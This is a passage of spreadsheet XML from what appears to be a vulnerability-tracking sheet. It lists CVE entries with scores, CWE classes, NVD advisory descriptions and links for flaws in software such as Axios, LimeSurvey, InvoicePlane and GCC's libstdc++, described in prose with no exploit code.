      </c>
      <c r="E139" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F139" s="5" t="inlineStr">
        <is>
          <t>help@fluidattacks.com</t>
        </is>
      </c>
      <c r="G139" s="5" t="inlineStr"/>
      <c r="H139" s="5" t="inlineStr"/>
      <c r="I139" s="5" t="inlineStr"/>
      <c r="J139" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K139" s="5" t="inlineStr"/>
      <c r="L139" s="5" t="inlineStr"/>
      <c r="M139" s="5" t="inlineStr"/>
      <c r="N139" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O139" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P139" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q139" s="5" t="inlineStr"/>
      <c r="R139" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S139" s="5" t="inlineStr">
        <is>
          <t>An authenticated LimeSurvey Community Edition 7.3.0 user allowed to create surveys can use their own survey as an authorized context while supplying question or answer identifiers belonging to another user's survey. The REST survey-patching endpoint checks the attacker's permission against the survey ID in the request URL, but the vulnerable persistence operations resolve the target object independently by its global qid or aid and never verify that it belongs to that authorized survey.</t>
        </is>
      </c>
      <c r="T139" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97685</t>
        </is>
      </c>
    </row>
    <row r="140">
      <c r="A140" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B140" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C140" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100392</t>
        </is>
      </c>
      <c r="D140" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E140" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F140" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G140" s="5" t="inlineStr"/>
      <c r="H140" s="5" t="inlineStr"/>
      <c r="I140" s="5" t="inlineStr"/>
      <c r="J140" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K140" s="5" t="inlineStr"/>
      <c r="L140" s="5" t="inlineStr"/>
      <c r="M140" s="5" t="inlineStr"/>
      <c r="N140" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O140" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P140" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q140" s="5" t="inlineStr"/>
      <c r="R140" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S140" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. In version 1.7.2, Users::form() performs no object-level authorization check on user_id = 1. A Secondary Administrator (user_type = 1, user_id != 1) can rewrite the Primary Administrator's user_type to 2 (Guest / read-only), destroying the root account's privilege and locking the legitimate owner out of the instance. At time of publication, there are no publicly available patches.</t>
        </is>
      </c>
      <c r="T140" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100392</t>
        </is>
      </c>
    </row>
    <row r="141">
      <c r="A141" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B141" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C141" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101898</t>
        </is>
      </c>
      <c r="D141" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E141" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F141" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G141" s="5" t="inlineStr"/>
      <c r="H141" s="5" t="inlineStr"/>
      <c r="I141" s="5" t="inlineStr"/>
      <c r="J141" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, requests</t>
        </is>
      </c>
      <c r="K141" s="5" t="inlineStr"/>
      <c r="L141" s="5" t="inlineStr"/>
      <c r="M141" s="5" t="inlineStr"/>
      <c r="N141" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O141" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P141" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q141" s="5" t="inlineStr"/>
      <c r="R141" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S141" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.13.0 until 1.20.0, Axios HTTP/2 request setup does not consistently apply proxy settings and caller-supplied DNS lookup policy. An HTTPS request uses httpVersion: 2 with explicit config.proxy or environment-derived proxy settings, or relies on caller-supplied config.lookup DNS policy. The HTTP/2 path can connect without the configured proxy behavior or without applying the caller-supplied config.lookup policy before http2.connect(). Requests can bypass the intended proxy route or the caller-supplied DNS resolution policy. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T141" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101898</t>
        </is>
      </c>
    </row>
    <row r="142">
      <c r="A142" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B142" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C142" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101907</t>
        </is>
      </c>
      <c r="D142" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E142" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F142" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G142" s="5" t="inlineStr"/>
      <c r="H142" s="5" t="inlineStr"/>
      <c r="I142" s="5" t="inlineStr"/>
      <c r="J142" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, gin</t>
        </is>
      </c>
      <c r="K142" s="5" t="inlineStr"/>
      <c r="L142" s="5" t="inlineStr"/>
      <c r="M142" s="5" t="inlineStr"/>
      <c r="N142" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O142" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P142" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q142" s="5" t="inlineStr"/>
      <c r="R142" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-601</t>
        </is>
      </c>
      <c r="S142" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.17.0 until 1.20.0, the fetch adapter bypasses the maxRedirects: 0 redirect policy. An Axios request uses the fetch adapter with maxRedirects set to zero and receives a redirect response. The underlying fetch implementation follows the redirect instead of returning the redirect response unchanged. The redirected request can access internal responses or reach state-changing internal endpoints despite redirects being disabled. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T142" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101907</t>
        </is>
      </c>
    </row>
    <row r="143">
      <c r="A143" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B143" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C143" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102010</t>
        </is>
      </c>
      <c r="D143" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E143" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F143" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G143" s="5" t="inlineStr"/>
      <c r="H143" s="5" t="inlineStr"/>
      <c r="I143" s="5" t="inlineStr"/>
      <c r="J143" s="5" t="inlineStr"/>
      <c r="K143" s="5" t="inlineStr"/>
      <c r="L143" s="5" t="inlineStr"/>
      <c r="M143" s="5" t="inlineStr"/>
      <c r="N143" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O143" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P143" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q143" s="5" t="inlineStr"/>
      <c r="R143" s="5" t="inlineStr">
        <is>
          <t>CWE-825</t>
        </is>
      </c>
      <c r="S143" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in GCC. When an application calls the erase_if function on a binary heap priority queue in libstdc++, the library reallocates storage but fails to update its internal entry pointer. An attacker capable of triggering this operation can exploit this use-after-free condition, leading to a Denial of Service (DoS) via an application crash or potential memory corruption.</t>
        </is>
      </c>
      <c r="T143" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102010</t>
        </is>
      </c>
    </row>
    <row r="144">
      <c r="A144" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B144" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C144" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80357</t>
        </is>
      </c>
      <c r="D144" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E144" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F144" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G144" s="5" t="inlineStr"/>
      <c r="H144" s="5" t="inlineStr"/>
      <c r="I144" s="5" t="inlineStr"/>
      <c r="J144" s="5" t="inlineStr">
        <is>
          <t>dell</t>
        </is>
      </c>
      <c r="K144" s="5" t="inlineStr"/>
      <c r="L144" s="5" t="inlineStr"/>
      <c r="M144" s="5" t="inlineStr"/>
      <c r="N144" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O144" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P144" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q144" s="5" t="inlineStr"/>
      <c r="R144" s="5" t="inlineStr">
        <is>
          <t>CWE-1191</t>
        </is>
      </c>
      <c r="S144" s="5" t="inlineStr">
        <is>
          <t>Dell Boot Optimized Server Storage (BOSS), versions prior to 2.2.13.2038, contains an On-Chip Debug and Test Interface With Improper Access Control vulnerability in the SMCU on 17G BOSS-N1 controllers. An unauthenticated attacker with physical access could potentially exploit this vulnerability, leading to Unauthorized access.</t>
        </is>
      </c>
      <c r="T144" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80357</t>
        </is>
      </c>
    </row>
    <row r="145">
      <c r="A145" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B145" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C145" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101004</t>
        </is>
      </c>
      <c r="D145" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E145" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F145" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G145" s="5" t="inlineStr"/>
      <c r="H145" s="5" t="inlineStr"/>
      <c r="I145" s="5" t="inlineStr"/>
      <c r="J145" s="5" t="inlineStr"/>
      <c r="K145" s="5" t="inlineStr"/>
      <c r="L145" s="5" t="inlineStr"/>
      <c r="M145" s="5" t="inlineStr"/>
      <c r="N145" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O145" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P145" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q145" s="5" t="inlineStr"/>
      <c r="R145" s="5" t="inlineStr">
        <is>
          <t>CWE-287, CWE-306</t>
        </is>
      </c>
      <c r="S145" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in notionnext-org NotionNext up to 4.10.10. Affected by this issue is the function cleanCache of the file pages/api/cache.js of the component Authentication Guard. The manipulation of the argument token leads to missing authentication. The attack may be initiated remotely. Versions 4.1.0 - 4.9.5.2 allow unauthenticated exploitation due to missing method check. In versions 4.9.5.7 - 4.10.10 a guard present but only enforced when CACHE_REVALIDATION_TOKEN is set. Default deployments remain unprotected. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T145" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101004</t>
        </is>
      </c>
    </row>
    <row r="146">
      <c r="A146" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B146" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C146" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101083</t>
        </is>
      </c>
      <c r="D146" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E146" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F146" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G146" s="5" t="inlineStr"/>
      <c r="H146" s="5" t="inlineStr"/>
      <c r="I146" s="5" t="inlineStr"/>
      <c r="J146" s="5" t="inlineStr"/>
      <c r="K146" s="5" t="inlineStr"/>
      <c r="L146" s="5" t="inlineStr"/>
      <c r="M146" s="5" t="inlineStr"/>
      <c r="N146" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O146" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P146" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q146" s="5" t="inlineStr"/>
      <c r="R146" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-284</t>
        </is>
      </c>
      <c r="S146" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in PMWeb v7.x/v8.x/v2025.x. Impacted is an unknown function in the library encryptionhelper.dll. Such manipulation leads to information disclosure. The attack may be launched remotely. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T146" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101083</t>
        </is>
      </c>
    </row>
    <row r="147">
      <c r="A147" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B147" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C147" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101900</t>
        </is>
      </c>
      <c r="D147" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E147" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F147" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G147" s="5" t="inlineStr"/>
      <c r="H147" s="5" t="inlineStr"/>
      <c r="I147" s="5" t="inlineStr"/>
      <c r="J147" s="5" t="inlineStr">
        <is>
          <t>node.js, axios</t>
        </is>
      </c>
      <c r="K147" s="5" t="inlineStr"/>
      <c r="L147" s="5" t="inlineStr"/>
      <c r="M147" s="5" t="inlineStr"/>
      <c r="N147" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O147" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P147" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q147" s="5" t="inlineStr"/>
      <c r="R147" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-693, CWE-74</t>
        </is>
      </c>
      <c r="S147" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.12.0 until 1.20.0, ResolveConfig reads inherited Symbol.toStringTag, append, and getHeaders properties while resolving FormData headers. A separate same-process prototype-pollution flaw supplies an array or non-plain class instance whose inherited properties make it appear FormData-like; plain objects are blocked. The inherited getHeaders function can return attacker-controlled headers that resolveConfig merges into a fetch adapter request. Attacker-controlled headers can alter authorization, cache, metadata-service, or application-specific request behavior. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T147" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101900</t>
        </is>
      </c>
    </row>
    <row r="148">
      <c r="A148" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B148" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C148" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101902</t>
        </is>
      </c>
      <c r="D148" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E148" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F148" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G148" s="5" t="inlineStr"/>
      <c r="H148" s="5" t="inlineStr"/>
      <c r="I148" s="5" t="inlineStr"/>
      <c r="J148" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, requests, gin</t>
        </is>
      </c>
      <c r="K148" s="5" t="inlineStr"/>
      <c r="L148" s="5" t="inlineStr"/>
      <c r="M148" s="5" t="inlineStr"/>
      <c r="N148" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O148" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P148" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q148" s="5" t="inlineStr"/>
      <c r="R148" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S148" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 0.27.2 until 0.34.0 and 1.20.0, Axios default-instance requests that omit an explicit method can read an inherited method value from Object.prototype. If another vulnerability in the same process pollutes Object.prototype.method, calls such as axios.request({ url }) and axios({ url }) can send a state-changing HTTP method instead of the expected default GET. Axios does not create the prototype pollution source. This is a read-side gadget in axios request dispatch. This issue is fixed in version 0.34.0 and 1.20.0.</t>
        </is>
      </c>
      <c r="T148" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101902</t>
        </is>
      </c>
    </row>
    <row r="149">
      <c r="A149" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B149" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C149" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101904</t>
        </is>
      </c>
      <c r="D149" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E149" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F149" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G149" s="5" t="inlineStr"/>
      <c r="H149" s="5" t="inlineStr"/>
      <c r="I149" s="5" t="inlineStr"/>
      <c r="J149" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, rust</t>
        </is>
      </c>
      <c r="K149" s="5" t="inlineStr"/>
      <c r="L149" s="5" t="inlineStr"/>
      <c r="M149" s="5" t="inlineStr"/>
      <c r="N149" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O149" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P149" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q149" s="5" t="inlineStr"/>
      <c r="R149" s="5" t="inlineStr">
        <is>
          <t>CWE-1321, CWE-74</t>
        </is>
      </c>
      <c r="S149" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.0.0 until 1.20.0, the dispatchRequest function normalizes inherited Object.prototype.headers from a replacement request configuration. A separate same-process prototype-pollution flaw sets Object.prototype.headers, and trusted request interceptors return a new ordinary configuration without an own headers property. After the interceptor chain, dispatchRequest resolves the inherited headers during normalization. Downstream request processing can observe attacker-controlled headers, including authorization-related values. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T149" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101904</t>
        </is>
      </c>
    </row>
    <row r="150">
      <c r="A150" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B150" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C150" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101908</t>
        </is>
      </c>
      <c r="D150" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E150" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F150" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G150" s="5" t="inlineStr"/>
      <c r="H150" s="5" t="inlineStr"/>
      <c r="I150" s="5" t="inlineStr"/>
      <c r="J150" s="5" t="inlineStr">
        <is>
          <t>node.js, axios, gin</t>
        </is>
      </c>
      <c r="K150" s="5" t="inlineStr"/>
      <c r="L150" s="5" t="inlineStr"/>
      <c r="M150" s="5" t="inlineStr"/>
      <c r="N150" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O150" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P150" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q150" s="5" t="inlineStr"/>
      <c r="R150" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="S150" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise-based HTTP client for the browser and Node.js. From 1.7.0 until 1.20.0, the fetch adapter constructs a Request with sanitized resolvedOptions but then calls fetch with the original fetchOptions. A separate same-process prototype-pollution flaw populates Object.prototype.headers so fetchOptions.headers resolves through inheritance. The inherited fetchOptions.headers value overrides the sanitized Request headers through the second argument to fetch after Request construction. Attacker-controlled request headers can alter authorization, caching, metadata-service access, or application-specific behavior. This issue is fixed in version 1.20.0.</t>
        </is>
      </c>
      <c r="T150" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101908</t>
        </is>
      </c>
    </row>
    <row r="151">
      <c r="A151" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B151" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C151" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101910</t>
        </is>
      </c>
      <c r="D151" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E151" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F151" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G151" s="5" t="inlineStr"/>
      <c r="H151" s="5" t="inlineStr"/>
      <c r="I151" s="5" t="inlineStr"/>
      <c r="J151" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K151" s="5" t="inlineStr"/>
      <c r="L151" s="5" t="inlineStr">
        <is>
          <t>npm:ip-address</t>
        </is>
      </c>
      <c r="M151" s="5" t="inlineStr">
        <is>
          <t>10.5.1</t>
        </is>
      </c>
      <c r="N151" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O151" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P151" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q151" s="5" t="inlineStr"/>
      <c r="R151" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="S151" s="5" t="inlineStr">
        <is>
          <t>ip-address is a library for parsing and manipulating IPv4 and IPv6 addresses in JavaScript. From 10.2.0 until 10.5.1, the Address6 isPrivate classifier in src/ipv6.ts does not recognize the NAT64 local-use range 64:ff9b:1::/48. Applications that combine isPrivate, isLoopback, and isLinkLocal for a trust-boundary decision can treat an internal IPv4 destination encoded through that range as external. Exploitation depends on a server network using an operator-selected NAT64 prefix within the local-use range. A successful bypass can cross the intended network trust boundary. This issue is fixed in version 10.5.1.</t>
        </is>
      </c>
      <c r="T151" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101910</t>
        </is>
      </c>
    </row>
    <row r="152">
      <c r="A152" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B152" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C152" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82935</t>
        </is>
      </c>
      <c r="D152" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E152" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F152" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G152" s="5" t="inlineStr"/>
      <c r="H152" s="5" t="inlineStr"/>
      <c r="I152" s="5" t="inlineStr"/>
      <c r="J152" s="5" t="inlineStr">
        <is>
          <t>aws, node.js</t>
        </is>
      </c>
      <c r="K152" s="5" t="inlineStr"/>
      <c r="L152" s="5" t="inlineStr"/>
      <c r="M152" s="5" t="inlineStr"/>
      <c r="N152" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O152" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P152" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q152" s="5" t="inlineStr"/>
      <c r="R152" s="5" t="inlineStr">
        <is>
          <t>CWE-1104</t>
        </is>
      </c>
      <c r="S152" s="5" t="inlineStr">
        <is>
          <t>mH-DEVELOPER smart home module ships with an end-of-life, unsupported Debian 8 and Node.js runtime v17.0.1 in its production firmware. This exposes the device to publicly known vulnerabilities that will not receive security patches. An attacker could exploit these known flaws to execute arbitrary code, access sensitive data, or cause a denial of service on the device.
Vulnerable components were updated or hardened, if update was not possible in version 3.0.30</t>
        </is>
      </c>
      <c r="T152" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82935</t>
        </is>
      </c>
    </row>
    <row r="153">
      <c r="A153" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B153" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C153" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91154</t>
        </is>
      </c>
      <c r="D153" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E153" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F153" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G153" s="5" t="inlineStr"/>
      <c r="H153" s="5" t="inlineStr"/>
      <c r="I153" s="5" t="inlineStr"/>
      <c r="J153" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K153" s="5" t="inlineStr"/>
      <c r="L153" s="5" t="inlineStr"/>
      <c r="M153" s="5" t="inlineStr"/>
      <c r="N153" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O153" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P153" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q153" s="5" t="inlineStr"/>
      <c r="R153" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="S153" s="5" t="inlineStr">
        <is>
          <t>Missing Authentication for Critical Function (CWE-306) in the product cache revalidation Server Action (src/app/actions.ts, revalidateProducts) in MarcosCamara01 Ecommerce Template before commit ec97209 allows a remote, unauthenticated attacker to force expiration of the entire storefront product cache at will. The file declares "use server" at file scope, so every exported function compiles into a POST-invokable Server Action; revalidateProducts calls updateTag("products") with no session or role check, unlike the read-only actions in the same file which are safe by construction. Two client components under src/components/admin import the function, which causes its Server Action id to be compiled into a public /_next/static chunk that the application's admin middleware (proxy.ts) does not gate, so any unauthenticated user can extract that id from the public bundle and invoke the action directly. With cacheComponents enabled, the entire storefront (home, categories, product pages, search) is served from "use cache" entries produced by getAllProducts, getCategoryProducts and getProduct, all tagged products 